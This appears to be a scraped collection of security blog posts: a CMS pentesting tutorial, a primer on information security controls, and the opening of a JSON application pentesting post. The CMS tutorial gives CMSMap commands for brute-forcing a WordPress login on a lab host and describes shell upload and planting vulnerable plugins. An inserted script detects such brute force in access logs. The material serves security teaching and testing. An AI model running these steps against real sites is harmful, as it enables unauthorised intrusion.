<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvuuZF8WntcFDxQ1o0cCkOhsOSqeRHim_bTaDxb6Sth8mU63ZfhT5WVW5dFEtfjBYTGHu0gq1Zf4Ux6WHXx1ekTPuuXwPV5dOiq5I1ghyn1gS1EJ8BRTriNold9S2mYDliedXZQ83lcwc/s1600/Screenshot+2018-11-24+at+4.54.22+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="382" data-original-width="649" height="376" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvuuZF8WntcFDxQ1o0cCkOhsOSqeRHim_bTaDxb6Sth8mU63ZfhT5WVW5dFEtfjBYTGHu0gq1Zf4Ux6WHXx1ekTPuuXwPV5dOiq5I1ghyn1gS1EJ8BRTriNold9S2mYDliedXZQ83lcwc/s640/Screenshot+2018-11-24+at+4.54.22+PM.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibSX1SETO7QgDY8sPlJjvbnmHx1UZSMCVlOnbSspsidygxoaJ1zxaLkl37z7XSUCcniqgsLWw4y-R6lUhKVJVKZwwJNER7mZ4HfILEehF9notGybVPdJFnA_QrP6lhZ-rV8hUiUZWcTJg/s1600/Screenshot+2018-11-24+at+4.57.05+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="381" data-original-width="652" height="372" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibSX1SETO7QgDY8sPlJjvbnmHx1UZSMCVlOnbSspsidygxoaJ1zxaLkl37z7XSUCcniqgsLWw4y-R6lUhKVJVKZwwJNER7mZ4HfILEehF9notGybVPdJFnA_QrP6lhZ-rV8hUiUZWcTJg/s640/Screenshot+2018-11-24+at+4.57.05+PM.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
I personally contacted many AMCs ethically regarding this issue, and they were able to fix it immediately, within a few hours or days, due to the criticality of the vulnerability :) In response, they appreciated my efforts.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
</div>
Narendra Bhatihttp://www.blogger.com/profile/07150714543762295098noreply@blogger.com0tag:blogger.com,1999:blog-3462277729309057123.post-81431593431187396862018-11-05T23:19:00.000+05:302019-09-13T13:10:31.423+05:30Pentesting CMS : Wordpress Joomla Drupal<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: left;">
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwg_vZqQgfFnDQRO4gab_wXIwRugQ6NDaDtGGZcw4vzjcjP3yRaD1W2vVKLVrZ-cKuvysWXdbuc_lEAzFQEytkb9jANMeuMV_H7weFb4TrJLcIDmgZel6D_ThVK8FNDkki_L67ZVcFUJw/s1600/cms.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="117" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwg_vZqQgfFnDQRO4gab_wXIwRugQ6NDaDtGGZcw4vzjcjP3yRaD1W2vVKLVrZ-cKuvysWXdbuc_lEAzFQEytkb9jANMeuMV_H7weFb4TrJLcIDmgZel6D_ThVK8FNDkki_L67ZVcFUJw/s400/cms.JPG" width="400" /></a></div>
<br />
Hello all, today we will see how we can pentest a CMS like WordPress, Drupal, Joomla, etc.</div>
<br />
<div style="text-align: left;">
Sometimes we get a CMS-based website or application on which to perform VAPT. Pentesting a CMS is a bit of a headache, because in a CMS the back-end code is mostly pre-defined by the nature and behaviour of the CMS: anyone can download the CMS package and create a website or blog in minutes without any coding knowledge or extra skills.</div>
<br />
<div style="text-align: left;">
So while pentesting a CMS we are mostly up against pre-defined (static) code designed by the experts behind WordPress, Drupal, Joomla, etc.</div>
<br />
<div style="text-align: left;">
First of all we have to map our target to get a structured view. It is better to crawl the target using different tools; Burp is a great option. Apart from this we can use "dirb", present in Kali Linux, which brute-forces URIs and directory names to check whether they exist.</div>
<br />
<br />
<a name='more'></a><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrt_GmVT23gpU1e4panmAriMN3B5iUBUFVdpCsj67I8HsfbnTRtboR_dlwNmnxSfc2NOq9AR430WSy7ZUQRfg9Wfbi4EeevEOP5crO29qZQ382bg0XBPr5raYt4GubtDoM9wYObFdddwM/s1600/Crawl.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="96" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrt_GmVT23gpU1e4panmAriMN3B5iUBUFVdpCsj67I8HsfbnTRtboR_dlwNmnxSfc2NOq9AR430WSy7ZUQRfg9Wfbi4EeevEOP5crO29qZQ382bg0XBPr5raYt4GubtDoM9wYObFdddwM/s640/Crawl.png" width="640" /></a></div>
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiM61Al8umXmUqb8ugQk170W6nnrgA6D3KmXByZKOUI87c48VyiUsO2aV7Rx3FHBEOSRzIVa1XUuJ9EHh34gLkQQKgTujfgPpyxWIi-5ZJQm3z20Rva7VLqyo-MolQEEc74P3f4Dk2Qn64/s1600/Dirb.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiM61Al8umXmUqb8ugQk170W6nnrgA6D3KmXByZKOUI87c48VyiUsO2aV7Rx3FHBEOSRzIVa1XUuJ9EHh34gLkQQKgTujfgPpyxWIi-5ZJQm3z20Rva7VLqyo-MolQEEc74P3f4Dk2Qn64/s640/Dirb.png" width="544" /></a></div>
<br />
<br />
<br />
<br />
After crawling we can look out for interesting things. In a CMS, enumeration is the most important part, because the default folder and page names are the same in every installation, but it is possible that the developer has also added some custom code according to their needs. Looking into these details might expose sensitive information.<br />
<br />
Crawling is also important if we are testing some other CMS like MODX, Exponent, Wolf CMS, etc., because the standard tools are only available for the top-level CMSs like WordPress, Joomla, Drupal, etc.<br />
<br />
<br />
<br />
Now we move on to automated testing of the CMS using different tools and scripts. There are many tools that help us quickly look for known vulnerabilities in a CMS; for the top CMSs there are separate tools for WordPress, Drupal and Joomla. Using them separately is a headache, so recently a new tool called "CMSMap" was released that has the functionality of all three in itself.<br />
<br />
Currently we are assuming that our target domain is - <strong>http://192.168.65.131/wordpress/</strong><br />
<br />
There are many options available in this tool; I will try to summarise them all.<br />
<br />
./cmsmap.py -t http://192.168.65.131[target]/wordpress<br />
<br />
This command performs all scans: getting the version, existing plugins, directory listing bugs, etc.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg68FfFd5pSgc2HCzI5JRn4c5JLZWSbfgp-x0xBS1H2tkZkQuBKDE2_95uEAtGQTX78URgqnL-JeEllc0KY56MAwn37ai6hCYsr7QT9OELU0AdQ091gvjXpBP9RUPVLehFtbdguOPjekio/s1600/cms-map-simple.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="292" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg68FfFd5pSgc2HCzI5JRn4c5JLZWSbfgp-x0xBS1H2tkZkQuBKDE2_95uEAtGQTX78URgqnL-JeEllc0KY56MAwn37ai6hCYsr7QT9OELU0AdQ091gvjXpBP9RUPVLehFtbdguOPjekio/s640/cms-map-simple.png" width="640" /></a></div>
<br />
You can also use another tool that performs similar tests to the ones shown.<br />
<br />
After getting this information, our first focus should be the version of the CMS and the installed plugins.<br />
<br />
If the version is older than the current one and is affected by some known vulnerabilities, that can help you get some meal.<br />
<br />
Sometimes, because of security plugins, the scanner will not work and stops after execution, so you need to supply a user-agent value yourself with --user-agent (look at the other options as well).<br />
<br />
For example, I would suggest <a href="http://websecgeeks.com/wolf-cms-arbitrary-file-upload-to-command-execution/" target="_blank">this post</a>, which was one of my findings. Suppose while scanning you figure out that the Wolf CMS version is 0.8.2; then you can look up / google a ready-made exploit or vulnerability for it, like this one:<br />
<div style="text-align: center;">
https://www.exploit-db.com/exploits/38000/</div>
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIbzh3BD8qT6_WSQCO03YNjY4QscCADaE9UzBB943hDBzTZk5tcyBKpMGdQdg97U0edvOfBusKg9gtBvdlKysFhn-5gyHqbBR9Ps7l68flhedRTg2Bb8nU8gk_faBBc6gZUg-YGqyKADY/s1600/eXPLOIT.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="278" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIbzh3BD8qT6_WSQCO03YNjY4QscCADaE9UzBB943hDBzTZk5tcyBKpMGdQdg97U0edvOfBusKg9gtBvdlKysFhn-5gyHqbBR9Ps7l68flhedRTg2Bb8nU8gk_faBBc6gZUg-YGqyKADY/s640/eXPLOIT.png" width="640" /></a></div>
<br />
<br />
These types of exploits have step-by-step information which you can use to exploit your target. Keep in mind the exploit can be for anything: the CMS version, a theme/module/extension, a third-party app, etc. You have to look into every detail for the possible exploit.<br />
<br />
<br />
<br />
The admin panel would be a great place to get some meal. Every CMS has its default location for the admin panel; for example, WordPress has site/wp-login.php, and others have their own. If you don't find any admin panel, it is possible that the developer made a smart move against attackers, so we can also try to brute force the admin location using "DirBuster" and Burp.<br />
<br />
For demonstration I used 5 locations as payloads in Burp. Here is the preview:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgcZ1DdDYtj4QvUjOERl91lNyBKWG_CKPNXysoPP6du-vVA2D7_ENku1K2cE9zsNiTvgjGdzhpNFRHwHD_yl13nd7pwdK7kIMO-DtMsxUV8LYBiZVo9vShuY7q5ahiUgCYaBLNoBJGud8I/s1600/admin-find.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="248" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgcZ1DdDYtj4QvUjOERl91lNyBKWG_CKPNXysoPP6du-vVA2D7_ENku1K2cE9zsNiTvgjGdzhpNFRHwHD_yl13nd7pwdK7kIMO-DtMsxUV8LYBiZVo9vShuY7q5ahiUgCYaBLNoBJGud8I/s640/admin-find.png" width="640" /></a></div>
<br />
<br />
<br />
So we can try to find out the admin panel. Now we have to guess/enumerate the username for brute forcing.<br />
<br />
Most probably you will see that many CMSs show a post time and a "Posted by" link at the top of every page.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjO8ecE6OroPlRxyMyLt6NmxgrWNnLLUcWIGYLU_-J-qNn_YWkjkfEYKSExMRD8Eu5vCxrd6stoBforff7DqQUojKVpFIJCbugP6GGna84nbA8lAQvb4igyOc7o1nG08guQzjkQj0do_84/s1600/target-user.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjO8ecE6OroPlRxyMyLt6NmxgrWNnLLUcWIGYLU_-J-qNn_YWkjkfEYKSExMRD8Eu5vCxrd6stoBforff7DqQUojKVpFIJCbugP6GGna84nbA8lAQvb4igyOc7o1nG08guQzjkQj0do_84/s1600/target-user.png" /></a></div>
<br />
<br />
When you click on that name it sends you to the author page. In the URL of that page you can find the username after /author/. For example, the username of this site is "iamthetargetuseradmin".<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjihwT27wloVdM2o2QukFfsNIlHjN_Mw2VQK7ceUHM0GZ9dXNB1FGxDjDQnXfzBbCJ2P9PwjgToxehC1Efbp8r2DT1B4ITFnkzgrdDfO3Y3nOPdmQo_-_vlWTQe_JzPlfqoeH_nDAeKmTU/s1600/target-url.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="48" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjihwT27wloVdM2o2QukFfsNIlHjN_Mw2VQK7ceUHM0GZ9dXNB1FGxDjDQnXfzBbCJ2P9PwjgToxehC1Efbp8r2DT1B4ITFnkzgrdDfO3Y3nOPdmQo_-_vlWTQe_JzPlfqoeH_nDAeKmTU/s640/target-url.png" width="640" /></a></div>
<br />
<br />
This URL value can be changed by the developer, so this is an alternate option to find out the username of our target; along with this, CMSMap, which we saw above, will also help find usernames.<br />
<br />
This is a WordPress CMS example, but if you are facing another CMS you can look for a similar way.<br />
<br />
Now it is time to brute force the admin panel. For brute forcing you can use different tools; I mostly prefer CMSMap and Burp Suite.<br />
<br />
I am showing the CMSMap example.<br />
<br />
<strong>./cmsmap.py -t http://192.168.65.131/wordpress/ -u admin -p /root/wpcrack.txt</strong><br />
<br />
This command will by default take the default login page of WordPress and start brute forcing as per the options:<br />
<br />
-u stands for username/username list & -p for password list<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgclMP1J4iQ_JrFQxcYH2cqPuITCWjkiAE5uRUHsWMMjE7L1ELtQXWGwvpeH81Zs_nfvG-SNNv8fvFQtvK2smtBtHMjls5zOV0Ds_IgFz_tcZEpxuEWJFIUnY05K1lM2kZ7ADc4KR9nY5s/s1600/cms-crack-1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="60" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgclMP1J4iQ_JrFQxcYH2cqPuITCWjkiAE5uRUHsWMMjE7L1ELtQXWGwvpeH81Zs_nfvG-SNNv8fvFQtvK2smtBtHMjls5zOV0Ds_IgFz_tcZEpxuEWJFIUnY05K1lM2kZ7ADc4KR9nY5s/s640/cms-crack-1.png" width="640" /></a></div>
<br />
<br />
As you can see in this screenshot, I already created a txt file with some passwords [the username is admin & the password is also admin for demonstration]. Now you can see that CMSMap failed to find valid credentials! That is because CMSMap by default uses the "xmlrpc" file, which WordPress uses for API calls, to perform the brute forcing.<br />
<br />
In my example the given WordPress install is not using "xmlrpc"; it depends on the functionality of the WordPress site, e.g. the popular WordPress plugin "Jetpack" needs xmlrpc to be enabled to work properly.<br />
<br />
So we have to instruct CMSMap not to use xmlrpc for brute forcing. We can use the option "--noxmlrpc" for this. An example is given below.<br />
<br />
<strong>./cmsmap.py -t http://192.168.65.131/wordpress/ -u admin -p /root/wpcrack.txt --noxmlrpc</strong><br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhsWUDESM3aolQO7C0inr4fzeH7oQ8SdzOtHhls5ZlD_ZPsjmO8qxo4GnT1cDy1FGC8dkz7CtYy8U92RrZc08kYbYwZqXGvQjP7DdQLCB94kKk6Re4TQn36ylegXl7pzrP9eppQxcLbPZo/s1600/wp-crack-2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="56" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhsWUDESM3aolQO7C0inr4fzeH7oQ8SdzOtHhls5ZlD_ZPsjmO8qxo4GnT1cDy1FGC8dkz7CtYy8U92RrZc08kYbYwZqXGvQjP7DdQLCB94kKk6Re4TQn36ylegXl7pzrP9eppQxcLbPZo/s640/wp-crack-2.png" width="640" /></a></div>
<br />
<br />
We found valid credentials. Now CMSMap will ask you to upload a shell; after pressing "Y" it will try to upload a custom shell into writable theme pages. If it succeeds it will prompt you with the shell URL.<br />
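From the defender's side, a CMSMap wordlist run like the one above is easy to spot in the web server's access log. The following is an added example, not part of the original post: it parses constructed Apache-style log lines and flags sources that hammer wp-login.php or xmlrpc.php; the threshold, the window and the sample addresses are assumptions.<br />

```python
"""Detect the kind of wordlist attack CMSMap runs against WordPress, from the
web server's access log.  Added example, not part of the original post: the
log lines below are constructed in Apache combined format, and the alerting
threshold/window and the addresses are assumptions."""
import re
from collections import defaultdict
from datetime import datetime

LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
# CMSMap POSTs to wp-login.php, or to xmlrpc.php unless --noxmlrpc is given.
LOGIN_PATHS = ("/wp-login.php", "/xmlrpc.php")
THRESHOLD = 5        # assumed: login POSTs from one source within WINDOW
WINDOW = 60          # assumed: seconds

# Constructed sample: 192.168.65.10 runs a wordlist against wp-login.php
# (eight 200s = the login form re-served after a failure, then a 302 =
# WordPress accepted the credentials), 192.168.65.11 makes two xmlrpc
# calls ten minutes apart, 192.168.65.12 merely loads the login page.
SAMPLE_LOG = [
    f'192.168.65.10 - - [22/Jun/2022:12:00:{s:02d} +0530] '
    f'"POST /wordpress/wp-login.php HTTP/1.1" 200 2843'
    for s in range(0, 16, 2)
] + [
    '192.168.65.10 - - [22/Jun/2022:12:00:17 +0530] "POST /wordpress/wp-login.php HTTP/1.1" 302 0',
    '192.168.65.11 - - [22/Jun/2022:12:00:05 +0530] "POST /wordpress/xmlrpc.php HTTP/1.1" 200 403',
    '192.168.65.11 - - [22/Jun/2022:12:10:05 +0530] "POST /wordpress/xmlrpc.php HTTP/1.1" 200 403',
    '192.168.65.12 - - [22/Jun/2022:12:00:09 +0530] "GET /wordpress/wp-login.php HTTP/1.1" 200 2843',
]


def parse_line(line):
    """Return a dict with ip, ts (aware datetime), method, path, status, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    rec["path"] = rec["path"].split("?", 1)[0]   # drop any query string
    return rec


def is_login_post(rec):
    """Only POSTs count: a GET of wp-login.php is just someone viewing the form."""
    return rec["method"] == "POST" and rec["path"].endswith(LOGIN_PATHS)


def find_bruteforce(lines, threshold=THRESHOLD, window=WINDOW):
    """Map each offending source IP to its attempt count and whether a
    wp-login.php POST was answered with a 302 (WordPress redirects to
    wp-admin only after a successful login; failures re-serve the form)."""
    per_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and is_login_post(rec):
            per_ip[rec["ip"]].append(rec)
    alerts = {}
    for ip, recs in per_ip.items():
        recs.sort(key=lambda r: r["ts"])
        start = 0
        for end, rec in enumerate(recs):
            # slide the window's left edge forward until it spans <= `window` s
            while (rec["ts"] - recs[start]["ts"]).total_seconds() > window:
                start += 1
            if end - start + 1 >= threshold:
                alerts[ip] = {
                    "attempts": len(recs),
                    "login_success": any(
                        r["status"] == 302 and r["path"].endswith("/wp-login.php")
                        for r in recs),
                }
                break
    return alerts


if __name__ == "__main__":
    for ip, info in find_bruteforce(SAMPLE_LOG).items():
        print(f"{ip}: {info['attempts']} login POSTs, success={info['login_success']}")
```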
<br />
The given example might not work in most cases, because mostly the theme may not be writable by an admin. So you can try the 2nd option: find a vulnerable plugin/module/extension (depending on the CMS and which kind of third-party tools/scripts it accepts) on exploit-db.com or somewhere else that stores exploits for vulnerable applications for other pentesters/hackers, upload it to the target website after login, then follow the steps given in the exploit details. Keep in mind, before uploading the vulnerable plugin make sure that it is also compatible with the version you are pentesting right now, because a non-compatible plugin might take your target site down or make it unavailable.<br />
<br />
Here is some useful information which might help while pentesting WordPress, Drupal & Joomla:<br />
<br />
Wordpress<br />
Default files: “readme.html”, “license.txt”<br />
Configuration file location: [examplesitefortesting.com]/wp-config.php<br />
Administrator login location: [examplesitefortesting.com]/wp-login.php<br />
Plugin location: [examplesitefortesting.com]/wp-content/plugins<br />
<br />
Drupal<br />
Default files: “CHANGELOG.txt”, “UPGRADE.txt”, “README.txt”<br />
Configuration file location: [examplesitefortesting.com]/sites/default/settings.php<br />
Plugin location: [examplesitefortesting.com]/?q=[pluginname]<br />
<br />
Joomla<br />
Default files: “joomla.xml”, “README.txt”, “htaccess.txt”<br />
Configuration file location: [examplesitefortesting.com]/configuration.php<br />
Administrator login location: [examplesitefortesting.com]/administrator<br />
Plugin location: [examplesitefortesting.com]/index.php?option=[pluginname]<br />
<br />
<br />
<br />
If you have any other idea or something to improve kindly comment below. :)<br />
<br /></div>
Narendra Bhatihttp://www.blogger.com/profile/15834240919754131768noreply@blogger.com0tag:blogger.com,1999:blog-3462277729309057123.post-16089201461096562622018-07-04T04:40:00.014+05:302024-02-11T20:52:00.714+05:30Information Security Controls<div dir="ltr" style="text-align: left;" trbidi="on">
Information security controls are mechanisms or a set of rules to
decrease the risk in terms of vulnerabilities, internal and external threats,
etc. Information security also covers the other aspects of an organisation
like computer security, physical security, network security, business
continuity planning, disaster recovery planning, and countermeasures against existing
or future attacks.<br />
<br />
These controls enable an organisation to keep its information confidential
from external or internal attacks; they also help the organisation keep
its systems running after any attack.<br />
<br />
They also give you a view of how secure your information is.<br />
<br />
<br />
<br />
Here are some important things which should be covered under Information
Security Controls.<br />
<ul>
<br />
<li>
This rule comes under physical security: each and every
person entering the organisation should pass through well-managed physical
security, which should be monitored properly to identify unknown
intruders.
</li>
<br />
<li>
Every piece of information generated or produced in an organisation should be
properly backed up from time to time to prevent data loss due to hacking attempts
and system failures. It is also recommended to create an extreme backup and
restore system which is run and managed properly.
</li>
<br />
<li>
An incident response capability should exist to respond immediately to any
incident, which can be anything: a fire, a physical attacker or
any technical hacking attack.
</li>
<br />
<li>
Keeping your employees trained and educated about incidents is also covered
by Information Security Controls. If your employees are well trained for
these types of situations then there will be less chance of any loss in the
organisation.
</li>
<br />
<li>
Log monitoring must be in place in the organisation to identify insider and outsider
attacks before an incident happens. Many organisations use log monitoring
for their web applications and internal systems, and for incoming and outgoing
traffic.
</li>
</ul>
<br />
<br />
<div style="text-align: center;">
<strong>Information security controls are mainly divided into 7 categories</strong>
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a
href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmTaLb4KXYIwEJDWH6bLkmaK4EvP3vmao7jjkIxloZhXbzT-BKVczBAkMjlIK7PI3gwliGeKjVhmXusPGsqiieTcfA3-nQOGlJm-9yaAbXzY-sI9wqvVcnX5-u3JNBogpDwmXjODJeNgE/s1600/enterprise_security_1.jpg"
imageanchor="1"
style="margin-left: 1em; margin-right: 1em;"
><img
border="0"
height="314"
src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmTaLb4KXYIwEJDWH6bLkmaK4EvP3vmao7jjkIxloZhXbzT-BKVczBAkMjlIK7PI3gwliGeKjVhmXusPGsqiieTcfA3-nQOGlJm-9yaAbXzY-sI9wqvVcnX5-u3JNBogpDwmXjODJeNgE/s320/enterprise_security_1.jpg"
width="320"
/></a>
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a
href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3iaZqYhwYmQFYVjM1vwuP_kt8L29VmuENll-u8HqfkMDT6rzM9ucJSxMJrnmEEwFNL1ulaaDRFO0XQXSlvunx8H96HeNiboF6ShN6rADToeljUAl9ffelzQTybAs-jzPb0vuCPIC6nO4/s1600/enterprise_security_1.jpg"
imageanchor="1"
style="margin-left: 1em; margin-right: 1em;"
><img
border="0"
height="392"
src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3iaZqYhwYmQFYVjM1vwuP_kt8L29VmuENll-u8HqfkMDT6rzM9ucJSxMJrnmEEwFNL1ulaaDRFO0XQXSlvunx8H96HeNiboF6ShN6rADToeljUAl9ffelzQTybAs-jzPb0vuCPIC6nO4/s400/enterprise_security_1.jpg"
width="400"
/></a>
</div>
<br />
<br />
1. Network Security<br />
<br />
<div style="text-align: left;">2. Access Control</div>
<br />
<div style="text-align: left;">3. Security Management</div>
<br />
<div style="text-align: left;">4. Physical Security</div>
<br />
<div style="text-align: left;">5. Business Continuity & DR Planning</div>
<br />
<div style="text-align: left;">6. Operations Security</div>
<br />
<div style="text-align: left;">7. Application/System Security</div>
<br />
<div style="text-align: left;"></div>
<br />
<div style="text-align: left;">
<strong>1.</strong> <strong>Network Security Controls</strong>
</div>
<br />
<div style="text-align: left;">
Network security controls are the first and most important part for an
organisation, because this part starts from the bottom line; you can say
this is the heart of any company. Network security covers its internal
devices like routers, switches and other devices which are very important
for an organisation to continue its work.
</div>
<br />
<div style="text-align: left;">
Setting up a firewall and UTM is recommended for every organisation to keep
control of its network environment.
</div>
<br />
<div style="text-align: left;"></div>
<br />
<div style="text-align: left;">
<strong>2.</strong> <strong>Access Controls</strong>
</div>
<br />
<div style="text-align: left;">
Access controls cover the rights or privileges of each and every user
in an organisation, including internal employees; access control comes
under authorisation. It is very important that every user has limited user
privileges and rights to continue their work; for example, an employee of an
organisation should not be able to perform administrator-level actions
like changing someone's password, accessing internal resources, etc.
</div>
<br />
<div style="text-align: left;">
<strong>3.</strong> <strong>Security Management</strong>
</div>
<br />
Security management is the classification of an organisation's asset
inventory, which should be accompanied by proper guidelines, rule sets and
documentation. Many organisations create security policies which should be followed
by their employees, for example that no employee can bring any storage device onto the
office premises, which decreases the risk of insider data theft.<br />
<br />
<strong>4.</strong> <strong>Physical Security</strong><br />
<br />
Physical security is also an important factor for an organisation to identify
an unknown intruder or attacker, and to decrease the risk of business loss from
fire, earthquake or any other natural or unnatural event.<br />
<br />
Many things come under physical security, like CCTV cameras,
security guards and fire prevention systems,<br />
<br />
and entry gate authentication such as fingerprint scanners or iris detection
mechanisms.<br />
<br />
<br />
<br />
<strong>5. Business Continuity & DR Planning</strong><br />
<br />
Business continuity & DR planning allow an organisation to keep running
its business normally if it is or was under attack, or has suffered data loss or system
failure.<br />
<br />
This control manages the whole data of an organisation, which is automatically
backed up from time to time so that it can be restored in case of data loss or any hacking
attack.<br />
<br />
<br />
<br />
<b>6. Operations Security</b><br />
<br />
OPSEC (Operations Security) covers unwanted or unintended risks that can be
used against us; OPSEC takes care of all these things by checking whether
any information can be used against us or not.<br />
<br />
<br />
<br />
<strong>7. Application/System Security</strong><br />
<br />
Application/system security is a major control for an organisation to
keep its online identity safe and confidential. This control covers
maintaining our application/system security with different technologies
like firewalls, IPS, SIEM and other log monitoring systems.<br />
<br />
This helps an organisation keep itself secure before or during an
attack.<br />
<br />
</div>
Narendra Bhatihttp://www.blogger.com/profile/15834240919754131768noreply@blogger.com0tag:blogger.com,1999:blog-3462277729309057123.post-67503095482891013602018-07-03T04:31:00.000+05:302019-09-13T12:55:54.093+05:30Attacking JSON Application : Pentesting JSON Application<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<br />
Hello all, it's been quite a long time since I updated my blog. So here we go.<br />
<br />
<br />
<br />
Today we will see how we can pentest a JSON web application.<br />
<br />
Note: some of the methods are taken from third-party resources and some are presented from my personal experience.<br />
<br />
<strong>First, what is <a href="http://www.json.org/">JSON</a>, according to the JSON website.</strong><br />
<br />
<b>JSON</b> (JavaScript Object Notation) is a lightweight data-interchange format. It is easy for humans to read and write. It is easy for machines to parse and generate. It is based on a subset of the JavaScript Programming Language, Standard ECMA-262 3rd Edition - December 1999<br />
<br />
In layman's terms, JSON is typically used by JavaScript to pass parameters, like in the HTTP request below.<br />
<br />
GET /site/getuserinfo=narendrabhati HTTP/1.1<br />
Host: websecgeeks.com<br />
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:44.0) Gecko/20100101 Firefox/44.0<br />
Content-Type: application/json;<br />
<br />
<a name='more'></a><br />
<br />
The response will typically look like this:<br />
<br />
HTTP/1.1 200 OK<br />
Cache-Control: private<br />
Content-Type: application/json; charset=utf-8<br />
Server: Microsoft-IIS/7.5<br />
X-AspNetMvc-Version: 4.0<br />
X-AspNet-Version: 4.0.30319<br />
X-Powered-By: ASP.NET<br />
Date: Wed, 21 Oct 2015 10:15:04 GMT<br />
Content-Length: 72<br />
<br />
{"name":"narendrabhati","email":"narendra.bhati@websecgeeks.com","website":"http://websecgeeks.com"}<br />
<br />
==========================================================================<br />
<br />
Now I am moving directly to the main part, which is the different ways to pentest a JSON application.<br />
<br />
<strong>1. Brute Force</strong><br />
<br />
Brute forcing, i.e. no limit on attempts on something like an authentication form, is the basic, traditional attack which we check in all web applications as well as JSON applications.<br />
<br />
If you face brute force protection, login attempt limits or captcha protection then you can <a href="http://websecgeeks.com/bypass-brute-force-protection-login-attempt-protection-captcha-bypass/" target="_blank">refer to this post of mine</a>.<br />
<br />
<br />
<br />
<b>2. XSS</b><br />
<br />
XSS in a JSON application is as simple as in a pre-JSON application. Basically the parameter we pass into the application is sent by JavaScript as an array, and the response is the same, so we have to break our payload out of the array.<br />
<br />
Normally there is a parameter in JSON applications called "callback", which was vulnerable recently. You can find the issue <a href="https://github.com/FriendsOfSymfony/FOSJsRoutingBundle/issues/112">here</a>.<br />
<br />
The payload should be like this in the URI:<br />
<br />
